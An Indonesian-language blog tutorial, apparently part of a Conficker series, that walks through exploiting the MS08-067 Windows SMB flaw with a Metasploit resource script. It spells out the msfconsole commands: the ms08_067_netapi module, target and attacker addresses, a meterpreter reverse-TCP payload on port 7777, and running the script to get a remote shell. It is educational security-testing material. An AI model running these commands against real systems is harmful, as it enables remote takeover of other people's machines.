0x2 Exploit MS08_67 – Resources Script

Tidak lama setelah vulnerability MS08-67 dipublikasikan, HD Moore segera menulis dan mengintegrasikannya pada Metasploit. Metasploit adalah sebuah framework untuk melakukan security testing. Adapun script lengkap dari exploit tersebut juga dapat dilihat dalam bahasa python pada link  Exploit MS08_67 dari www.securityfocus.com.

Pada artikel ini, kita akan melakukan exploit menggunakan metasploit framework, khususnya dengan menggunakan Resources Script. Menurut HD Moore, resources script merupakan batch file yang digunakan di Metasploit Framework untuk melakukan otomasi perintah. Berikut ini adalah langkah-langkah yang kita lakukan ketika membuat resources script:

  1. Memakai exploit bagi MS08_67, yaitu: use exploit/windows/smb/ms08_067_netapi
  2. Menetapkan target, yaitu: set RHOST 172.16.123.251
  3. Menetapkan payload, yaitu: set PAYLOAD windows/meterpreter/reverse_tcp
  4. Menetapkan localhost dari attacker, yaitu: set LHOST 172.16.123.252
  5. Menetapkan port yang digunakan pada attacker, yaitu: set LPORT 7777
  6. Mengeksekusi seluruh perintah, yaitu: exploit -j -z

Gambar berikut ini menjelaskan langkah-langkah yang kita lakukan:

Screen Shot 2016-03-06 at 6.27.29 AM

Adapun isi script conficker.rc secara utuh adalah:

Screen Shot 2016-03-06 at 6.33.37 AM

Selanjutnya setelah resources file tersebut selesai kita buat. Maka kita mengeksekusi script tersebut dengan perintah msfconsole -r <resources script>.  Script akan berjalan dan melakukan Remote Code Execution hingga kita mendapatkan command prompt dari mesin target sebagaimana gambar berikut:

Screen Shot 2016-03-06 at 6.34.32 AM

Dari mesin attacker, kita dapat menjalankan remote acces sebagaimana gambar berikut ini:

Screen Shot 2016-03-06 at 7.33.26 AM

Apabila serangan dilakukan hanya untuk satu sasaran mungkin tidak bermasalah. Namun, untuk melakukan serangan bersifat massal tentu cara ini tidak efisien. Artikel berikut ini akan membahas bagaimana conficker melakukan serangan massal terhadap banyak mesin.

Adapun link terkait dengan artikel ini adalah:

<01> 0x0 Conficker Story

<02> 0x1 Target Selection